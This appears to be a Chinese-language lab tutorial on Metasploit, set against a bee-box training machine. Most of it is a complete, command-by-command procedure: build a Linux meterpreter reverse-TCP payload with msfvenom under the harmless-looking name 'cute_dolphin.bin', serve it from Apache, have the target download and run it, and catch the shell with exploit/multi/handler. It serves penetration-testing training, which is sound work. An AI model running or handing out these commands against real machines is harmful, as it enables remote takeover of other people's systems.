metasploit 简介
metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
实验步骤
1、生成被控端并在靶机运行
①生成程序
1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=4443 -f elf > cute_dolphin.bin
2.将文件复制到网站的目录(/var/www/html)下
cp cute_dolphin.bin /var/www/html
ls 查看指定目录下的所有文件
②启动apache2服务
启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
③在靶机中下载
1.在bee-box的浏览器输入:192.168.137.128(kali的IP)/cute_dolphin.bin ,下载payload文件
2.添加执行权限
chmod +x cute_dolphin.bin
2、建立连接
①启动metasploit
②配置参数
⑴进入handler模块
use exploit/multi/handler
⑵设置攻击载荷
set payload linux/x86/meterpreter/reverse_tcp
⑶设置lhost为kali的IP
set lhost 192.168.137.128
⑷设置lpost
set lport 4443
⑸运行靶机上文件,会话建立
拓展
1、查看帮助信息
msfvenom --help
2、查看所有可以使用的攻击模块
msfvenom -l payloads
3、查看攻击载荷需要设置的参数
msfvenom --list-options -p linux/x86/meterpreter/reverse_tcp